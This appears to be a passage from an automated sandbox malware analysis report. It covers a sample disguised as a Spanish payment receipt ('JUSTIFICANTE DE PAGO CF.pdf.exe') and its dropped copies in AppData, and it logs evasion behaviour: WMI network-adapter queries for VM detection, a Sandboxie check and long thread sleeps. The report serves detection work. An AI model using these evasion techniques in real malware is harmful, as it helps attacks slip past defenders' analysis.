                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.0000000003308000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.00000000030FE000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.000000000296E000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.0000000002B6F000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.000000000256E000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.000000000276F000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000288F000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000268E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeMemory allocated: 15C0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeMemory allocated: 30A0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeMemory allocated: 50A0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeMemory allocated: 2C10000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeMemory allocated: 2E90000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeMemory allocated: 2C10000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeMemory allocated: 2960000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeMemory allocated: 2A20000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeMemory allocated: 2960000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeMemory allocated: 18D0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeMemory allocated: 32D0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeMemory allocated: 3120000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMemory allocated: F60000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMemory allocated: 2910000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMemory allocated: 4910000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMemory allocated: 2EB0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMemory allocated: 30A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMemory allocated: 2EE0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeMemory allocated: 750000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeMemory allocated: 2510000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeMemory allocated: 21E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeMemory allocated: 2C50000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeMemory allocated: 2ED0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeMemory allocated: 2CD0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMemory allocated: 24A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMemory allocated: 2630000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMemory allocated: 4630000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMemory allocated: 15A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMemory allocated: 3010000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMemory allocated: 5010000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 599890Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 599781Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 599671Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 599562Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 599399Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 599296Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 599180Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 599062Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 598953Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 598812Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 598703Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 598593Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 598484Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 598375Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 598265Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 598156Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 598046Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 597937Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 597827Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 597718Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599890Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599781Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599671Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599562Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599453Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599343Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599234Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599125Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599015Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598906Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598796Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598687Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598578Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598468Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598359Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598247Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598097Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 597968Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 597856Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 600000
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599874
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599750
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599637
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599516
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599406
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599297
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599188
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599078
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598969
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598844
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598734
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598624
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598515
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598406
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598297
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598187
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598078
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 600000
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599875
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599765
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599653
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599547
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599437
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599328
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599218
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599110
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598985
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598860
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598735
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598610
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598485
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598360
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598219
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598109
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598000
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 600000
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599890
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599781
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599672
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599547
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599438
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599313
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599195
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599078
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598969
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598859
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598750
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598641
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598516
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598391
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598281
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598151
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeWindow / User API: threadDelayed 542Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeWindow / User API: threadDelayed 3402Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeWindow / User API: threadDelayed 7910Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeWindow / User API: threadDelayed 1876Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWindow / User API: threadDelayed 565Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWindow / User API: threadDelayed 2929Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWindow / User API: threadDelayed 2180Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWindow / User API: threadDelayed 7668Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWindow / User API: threadDelayed 370
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWindow / User API: threadDelayed 2757
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWindow / User API: threadDelayed 8062
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWindow / User API: threadDelayed 1786
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWindow / User API: threadDelayed 2428
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWindow / User API: threadDelayed 562
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWindow / User API: threadDelayed 1977
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWindow / User API: threadDelayed 7826
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWindow / User API: threadDelayed 933
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWindow / User API: threadDelayed 2100
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWindow / User API: threadDelayed 1665
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWindow / User API: threadDelayed 8164
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 3424Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 3424Thread sleep time: -600000s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 4612Thread sleep count: 542 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 3424Thread sleep time: -599890s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 4612Thread sleep count: 3402 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 3424Thread sleep time: -599781s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 3424Thread sleep time: -599671s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 3424Thread sleep time: -599562s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 3424Thread sleep time: -599399s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 3424Thread sleep time: -599296s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 3424Thread sleep time: -599180s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 3424Thread sleep time: -599062s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 3424Thread sleep time: -598953s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 3424Thread sleep time: -598812s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 3424Thread sleep time: -598703s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 3424Thread sleep time: -598593s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 3424Thread sleep time: -598484s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 3424Thread sleep time: -598375s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 3424Thread sleep time: -598265s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 3424Thread sleep time: -598156s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 3424Thread sleep time: -598046s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 3424Thread sleep time: -597937s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 3424Thread sleep time: -597827s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 3424Thread sleep time: -597718s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 6568Thread sleep time: -30000s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 4724Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep count: 33 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe TID: 5572Thread sleep time: -100000s >= -30000sJump to behavior
